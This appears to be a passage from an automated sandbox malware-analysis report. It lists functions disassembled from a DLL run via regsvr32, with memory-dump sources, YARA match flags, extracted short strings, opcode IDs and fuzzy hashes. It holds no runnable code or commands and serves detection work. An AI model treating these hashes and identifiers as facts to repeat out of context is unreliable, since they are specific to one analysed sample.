                                                      • Instruction Fuzzy Hash: 84D1E5705087CC8BDBFEDF68C8857DA7BA8FB44748F104219EA0A9E269CB745749CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180018BDC Relevance: 5.2, Strings: 4, Instructions: 245COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 57$7|$K-~$`by
                                                      • API String ID: 0-1764728439
                                                      • Opcode ID: 3d75101ad2ff9bc1d340fad9c74c74685bf15c99ef7bfcf0826df8ee18983ab7
                                                      • Instruction ID: 0ef0f182f1da72c174031fc5be9a225670cb57be642fb1d84f9edf9d7426cf45
                                                      • Opcode Fuzzy Hash: 3d75101ad2ff9bc1d340fad9c74c74685bf15c99ef7bfcf0826df8ee18983ab7
                                                      • Instruction Fuzzy Hash: 5EC1227510160CCBDBA8DF38C48A6DD3BE1FF58308F605129FC2A9A266C7B4D959CB44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018000B350 Relevance: 5.2, Strings: 4, Instructions: 243COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #X$"*$DgQ$6i
                                                      • API String ID: 0-2770996495
                                                      • Opcode ID: 820f3a7f2831d7bc6be119a51f5435b60720529f940ec106d6c272ece28fcda8
                                                      • Instruction ID: 504b32a01a029d54a9cc7c4b79b1c57dce6396aa3b2efbc72770fc67d95dc726
                                                      • Opcode Fuzzy Hash: 820f3a7f2831d7bc6be119a51f5435b60720529f940ec106d6c272ece28fcda8
                                                      • Instruction Fuzzy Hash: CCB10871A0870CABDFA9DFA8E4896DDBBF1FB44344F00451DE446A7290DB749A0ECB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180028998 Relevance: 5.2, Strings: 4, Instructions: 216COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: O:M$iJ"]$p$p
                                                      • API String ID: 0-2745201584
                                                      • Opcode ID: c580725723075c93842e669fadfa9b9fa9ca71e2e3fa7497301af4adcf51def7
                                                      • Instruction ID: 8b688321e04c0e646b0fc78ee6d67cd940f90a9f6723fb1f8222d7259e9641f4
                                                      • Opcode Fuzzy Hash: c580725723075c93842e669fadfa9b9fa9ca71e2e3fa7497301af4adcf51def7
                                                      • Instruction Fuzzy Hash: 8AB10070D143098BCB89DFA8D486AEEBBF0FB48304F14851EE856B7250D7749A44CFA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D25E01 Relevance: 5.2, Strings: 4, Instructions: 178COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2617C
                                                      • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 000007FEF9D260C7
                                                      • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25FE7
                                                      • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25EF9
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).
                                                      • API String ID: 0-1867057952
                                                      • Opcode ID: 2a9d8457aa34911385b660402f71547a5181f90184c5f28ce50b42f7ee7f8c58
                                                      • Instruction ID: 7eafebeb16ca57a5525b51ed0f378306bc52b64ad103bedb915b9118f6e813be
                                                      • Opcode Fuzzy Hash: 2a9d8457aa34911385b660402f71547a5181f90184c5f28ce50b42f7ee7f8c58
                                                      • Instruction Fuzzy Hash: 1A810C36A18B4586DB94CF59E49072EB7A0F3C4794F610526EACD87BA8DBBED441CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180016AF4 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 8('$6fA$9\D$OG3
                                                      • API String ID: 0-2292045659
                                                      • Opcode ID: 075f2f4683c67ac2050461b4b976e23f7824189084b04fb6fcbf6660b49be205
                                                      • Instruction ID: ef0df636cc5d4b1adb12f513697d006f7e6ff77cbfd46ce7bca5e6c4611c7a17
                                                      • Opcode Fuzzy Hash: 075f2f4683c67ac2050461b4b976e23f7824189084b04fb6fcbf6660b49be205
                                                      • Instruction Fuzzy Hash: 6E8166B591130DCFDB98CF28C18A5CA3BA8FF55318F00412AFC1E9A264D3B4E959CB46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180020AA0 Relevance: 5.1, Strings: 4, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !j$IzY$w4$0Oa
                                                      • API String ID: 0-1210086663
                                                      • Opcode ID: d22984424f9e842513d0b81fbf00519d97f66b1438588327bee25b78db1a615b
                                                      • Instruction ID: d6ae16ce1753066c3a100fad89cd7b933425bd3752a83aacc50f13ca8011d066
                                                      • Opcode Fuzzy Hash: d22984424f9e842513d0b81fbf00519d97f66b1438588327bee25b78db1a615b
                                                      • Instruction Fuzzy Hash: 4E41CFB090034E8BCF88CF65C48A5DE7FB0FB68358F104619E916A6250D7B896A9CFC5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018002AF38 Relevance: 4.1, Strings: 3, Instructions: 363COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !fl$>q$>q
                                                      • API String ID: 0-3196423155
                                                      • Opcode ID: dccb224850b43dda665c2028c8e90cf7ac528c4769e1ed18f59b4bae66e0f67a
                                                      • Instruction ID: 6e0169028e0bb78a63dbed9d1dbc36ce20ef11fe4735bb4ca27ada0b4c61fd75
                                                      • Opcode Fuzzy Hash: dccb224850b43dda665c2028c8e90cf7ac528c4769e1ed18f59b4bae66e0f67a
                                                      • Instruction Fuzzy Hash: 18022574A0670CDBCBA9CFA8E48A69DBBF1FF14388F104119F816A7261C7B49919CB45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180006B24 Relevance: 4.0, Strings: 3, Instructions: 284COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "Gd$C2$HG
                                                      • API String ID: 0-142661339
                                                      • Opcode ID: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                      • Instruction ID: f3040b85d87bafdcd4b0814e46a5c4b4479db0c4bbfe4c952327208bca537128
                                                      • Opcode Fuzzy Hash: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                      • Instruction Fuzzy Hash: 20C112719047CD8FDB89CFA8C88A6ED7BB1FB48354F104229F80697660DBB4D949CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180023624 Relevance: 4.0, Strings: 3, Instructions: 282COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: QZB$Vu9($W1Z
                                                      • API String ID: 0-4157987319
                                                      • Opcode ID: 1f5c37778751f5a7f2813f46734b265b9b5d3f173c04e1f04c47467fdefc8410
                                                      • Instruction ID: f699ba934c7511d53ebf66ced97cbd47477d8f387fb8544ab73dfc8f8e8f4cc9
                                                      • Opcode Fuzzy Hash: 1f5c37778751f5a7f2813f46734b265b9b5d3f173c04e1f04c47467fdefc8410
                                                      • Instruction Fuzzy Hash: 7DE1E870505B888FDBB9DF24CC897EBBBE1FB84705F10551EE84A9A290DBB49648CF41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018000A26C Relevance: 4.0, Strings: 3, Instructions: 277COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #X$1c+$,p
                                                      • API String ID: 0-4193689514
                                                      • Opcode ID: 870c2a5dff4c858b49c61e00ad2e43c057056019502a976b576cc033676d3952
                                                      • Instruction ID: a14642629d5f8cbd2a1e8fb09d7711f81952208659678b8c12dc59c418106fb0
                                                      • Opcode Fuzzy Hash: 870c2a5dff4c858b49c61e00ad2e43c057056019502a976b576cc033676d3952
                                                      • Instruction Fuzzy Hash: A0F166B5906749CFCB88DF68C28A58D7BF1BF59304F404129FC1A9A260D3B4E529CB49
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180018628 Relevance: 4.0, Strings: 3, Instructions: 203COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: :a$o1$F
                                                      • API String ID: 0-2167756397
                                                      • Opcode ID: 1dc69b1f9148db4d8f727193868d76463b7f9b687988be903e8d180db9dc4b1f
                                                      • Instruction ID: c7b3f013bdef5c33efa64e5817367d2177fa9b070e37e7fa0e85b95e6b1d5a97
                                                      • Opcode Fuzzy Hash: 1dc69b1f9148db4d8f727193868d76463b7f9b687988be903e8d180db9dc4b1f
                                                      • Instruction Fuzzy Hash: 24A10170514609DFCB98DF28C58A6DE3BE1FF58318F40822AFC0A9B264C774DA58DB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180008C9C Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "7F$hso$|
                                                      • API String ID: 0-2223032787
                                                      • Opcode ID: a1c5852e2975669cd72ae99173752b080c1a60bb39e1eda62f5b8b24312d50f2
                                                      • Instruction ID: 597be8bf6f8274430a7b1b716aee764a508e33f64a18c5174bbc12e988f7dea5
                                                      • Opcode Fuzzy Hash: a1c5852e2975669cd72ae99173752b080c1a60bb39e1eda62f5b8b24312d50f2
                                                      • Instruction Fuzzy Hash: CDA1E7716057888FEB7ADF64C8AA7DE7BA1FF59308F40461DD98E8E250C7B45608CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800090B4 Relevance: 3.9, Strings: 3, Instructions: 158COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: eG$ktw$l$6
                                                      • API String ID: 0-3696190584
                                                      • Opcode ID: cfb728ef8011932e57c4461def4d81df8b30877acb09ef5991ab02cb5d25377a
                                                      • Instruction ID: ec7ece3e5b0c03f4df558a0a1733d02cea5b85f33e09dae2f6683fda9d55fcb2
                                                      • Opcode Fuzzy Hash: cfb728ef8011932e57c4461def4d81df8b30877acb09ef5991ab02cb5d25377a
                                                      • Instruction Fuzzy Hash: E47114B0509708EFCB98DF68C089A9E7BB1FB88344F40C52EE849DB264C775DA19CB45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180004B18 Relevance: 3.9, Strings: 3, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %Di|$6qp$Z9s
                                                      • API String ID: 0-2690900941
                                                      • Opcode ID: 036a56b574e0cc9d8bbe6e2c16f1c72bf3a7a337ff5cb561951f94e63896fd73
                                                      • Instruction ID: 2c0d7369d6c4e2fe59306caeaa3cf354025216a739d91ba443ab140e2def37b4
                                                      • Opcode Fuzzy Hash: 036a56b574e0cc9d8bbe6e2c16f1c72bf3a7a337ff5cb561951f94e63896fd73
                                                      • Instruction Fuzzy Hash: 9C61257191070C9BCB88CF24C8C96DE7BB1FB483A8F556219FC0AAA294C7749985CF84
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180007678 Relevance: 3.9, Strings: 3, Instructions: 140COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Fl$Fl$vv5
                                                      • API String ID: 0-3053741108
                                                      • Opcode ID: 56c6ca64a2739fcec8bf5f3302d493d90fa60cbb6fd5cd63e6a43fd0d8d3c1f6
                                                      • Instruction ID: 55f6967587c9a541224425d329b03615816d53db549f94b6db3b05c8e91cbb03
                                                      • Opcode Fuzzy Hash: 56c6ca64a2739fcec8bf5f3302d493d90fa60cbb6fd5cd63e6a43fd0d8d3c1f6
                                                      • Instruction Fuzzy Hash: FC511A70E4870CAFDB69DFA8E0866DDBBF1FB58344F004519E40AE7291DB74990ACB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180016DA8 Relevance: 3.9, Strings: 3, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: H8$nn$nn
                                                      • API String ID: 0-4263809824
                                                      • Opcode ID: 01947e023cac002b8a0a3e4f78c79794eac0dde5bb4d18b8413bbe4288169ddb
                                                      • Instruction ID: 3c01ac5d5c2d3476a5cfb8eba6abf236e6c64549312703f260b6bb5002efdfbd
                                                      • Opcode Fuzzy Hash: 01947e023cac002b8a0a3e4f78c79794eac0dde5bb4d18b8413bbe4288169ddb
                                                      • Instruction Fuzzy Hash: 5361D67555878CCBEBBADF38CC897D97BB1FB48344F908219D80E8A260DB7457498B41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180028348 Relevance: 3.9, Strings: 3, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %Nz$,7%$}]{
                                                      • API String ID: 0-2809531587
                                                      • Opcode ID: 676dc21c0f372b2db907baa94ef17c562d056d3d3dc12d9c581eeda360082d12
                                                      • Instruction ID: b36c8970f11ad41429e233920f6dac2517fe43d92b96f19f813f385ea8bb4fb2
                                                      • Opcode Fuzzy Hash: 676dc21c0f372b2db907baa94ef17c562d056d3d3dc12d9c581eeda360082d12
                                                      • Instruction Fuzzy Hash: B771E470448788CBEBB5DF24C8856DEBBE4FB88744F60451DE9598B260DB749688CF01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018001ACB4 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,mQ$f41$c
                                                      • API String ID: 0-1594525360
                                                      • Opcode ID: 7f89cf11389eafb96d04b6400e87a1f2a1e5a7f99f0c72ab3958d5ee7197d732
                                                      • Instruction ID: ca916729033610084f534c396dc33c1afc583cc00ddec4c12c7a73cc6334aceb
                                                      • Opcode Fuzzy Hash: 7f89cf11389eafb96d04b6400e87a1f2a1e5a7f99f0c72ab3958d5ee7197d732
                                                      • Instruction Fuzzy Hash: AD51C071D0424C8BCB48DFA9E98A9DDBBF0FB48348F11820DE85AB7261C7749905CF69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018001370C Relevance: 3.8, Strings: 3, Instructions: 99COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $q~$%s$R3
                                                      • API String ID: 0-2520873970
                                                      • Opcode ID: 3d3ced99ac42584346b8bad3007d62ef26daa4ae2805a0976e45a495c47b2b96
                                                      • Instruction ID: 49708784934b6f27b099c9a4c0d62a5c340693359db0e98dd39e1096da177659
                                                      • Opcode Fuzzy Hash: 3d3ced99ac42584346b8bad3007d62ef26daa4ae2805a0976e45a495c47b2b96
                                                      • Instruction Fuzzy Hash: 2D414870508784DBD398CF18C0DA65EBBF1FB853A4FA0691DF583862A4DB75D9898B03
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800061A0 Relevance: 3.8, Strings: 3, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: [/$s$|'
                                                      • API String ID: 0-508247755
                                                      • Opcode ID: 7345308087df3ea52099129a82f0c3ea94bf5dab89828cea5ac59a44806af735
                                                      • Instruction ID: 494a7eb40676bfcc00c7fdba1f25141f52c7cc4812b1f7e8e8b884a852a0e06c
                                                      • Opcode Fuzzy Hash: 7345308087df3ea52099129a82f0c3ea94bf5dab89828cea5ac59a44806af735
                                                      • Instruction Fuzzy Hash: 1841D4B090038E8FCB48DFA9D88A5DEBBB1FB48348F10461DEC25A6250D7B49554CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180012378 Relevance: 3.8, Strings: 3, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: _#>$`cb{$fq
                                                      • API String ID: 0-41881557
                                                      • Opcode ID: 6dffa8c73f5f57da7de5f12e066b229d1e4dd53f1b7788c47ce25402a50e5fa7
                                                      • Instruction ID: 8d8b26aa43ab9a83d147a377112b64bfb8255cca975d25c3e902dea97d059722
                                                      • Opcode Fuzzy Hash: 6dffa8c73f5f57da7de5f12e066b229d1e4dd53f1b7788c47ce25402a50e5fa7
                                                      • Instruction Fuzzy Hash: 2941C0B180078E8FCF48CF64C88A5DE7FB0FB58358F104619E86AA6250D3B89665CFC4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180012680 Relevance: 3.8, Strings: 3, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: =Z8$[U${To
                                                      • API String ID: 0-582923006
                                                      • Opcode ID: 510822f7632221338f4787e6ba9fbd6d482cd1ebd2bab9e95bda9979d09408e7
                                                      • Instruction ID: dd1ba70993956fe5376c9027ab0fa5dab7ea2e8642491db667c41f00a9894f6d
                                                      • Opcode Fuzzy Hash: 510822f7632221338f4787e6ba9fbd6d482cd1ebd2bab9e95bda9979d09408e7
                                                      • Instruction Fuzzy Hash: DA31AFB090074ECBCB88DF64C88A4DF7FB4FB68398F104219E855A6250D3B896A5CFD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180006414 Relevance: 2.8, Strings: 2, Instructions: 314COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: L$u.
                                                      • API String ID: 0-1908859981
                                                      • Opcode ID: 963c97d349dba17e05ff2ad4f8c091e323bd32606f741df39a0923b695cd3283
                                                      • Instruction ID: fe013bb6a98280fd3664de29af0d6deafe853b8c6d857857911529a75c261ac8
                                                      • Opcode Fuzzy Hash: 963c97d349dba17e05ff2ad4f8c091e323bd32606f741df39a0923b695cd3283
                                                      • Instruction Fuzzy Hash: FDE1167152478DABDF98CF28C8C6ADD3BA1FB48394F906229FD0287260D775D985CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018000968C Relevance: 2.8, Strings: 2, Instructions: 290COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: v^$|8W
                                                      • API String ID: 0-4274756280
                                                      • Opcode ID: e8f720407405c8f842976055ebfe5a961945bc41caeca3a3e9e3a1284d36038d
                                                      • Instruction ID: eb46043f5dfd862e599a3e1f0545fc92660674d3eece30cf186a2abccef00301
                                                      • Opcode Fuzzy Hash: e8f720407405c8f842976055ebfe5a961945bc41caeca3a3e9e3a1284d36038d
                                                      • Instruction Fuzzy Hash: 23D11171A0630CCBDB68DF68C58AA9D7BE1FF59348F104129FC1A9B261C770E919CB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180001E88 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `:$u5\
                                                      • API String ID: 0-1141760586
                                                      • Opcode ID: de639cec483ce4a43014a1f68f5d3fafad908dcfa8fcc167b954aac45c8ab292
                                                      • Instruction ID: 309421123f437f89acc2771e6a55141bc20ba277e2d56715f434ec53ca724750
                                                      • Opcode Fuzzy Hash: de639cec483ce4a43014a1f68f5d3fafad908dcfa8fcc167b954aac45c8ab292
                                                      • Instruction Fuzzy Hash: 69C1207150574DCBDB99CF28C58A6D93BE5FF98348F104129FC0E862A1CBB4EA18CB46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180022AAC Relevance: 2.8, Strings: 2, Instructions: 250COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0Au$]6
                                                      • API String ID: 0-775207805
                                                      • Opcode ID: 41d6d67fb4784ff97a0c8e7ec9a302166e0b0c9de4538925550087b6d031b924
                                                      • Instruction ID: 6edab2825e6f92fa7d6d5649e6783b0aef41eda7633721283519dacdcc01bd9d
                                                      • Opcode Fuzzy Hash: 41d6d67fb4784ff97a0c8e7ec9a302166e0b0c9de4538925550087b6d031b924
                                                      • Instruction Fuzzy Hash: 2DE1D7706047889FCBBEDF24CC897DA7BA8FB46704F904619E9C98E250DB745748CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

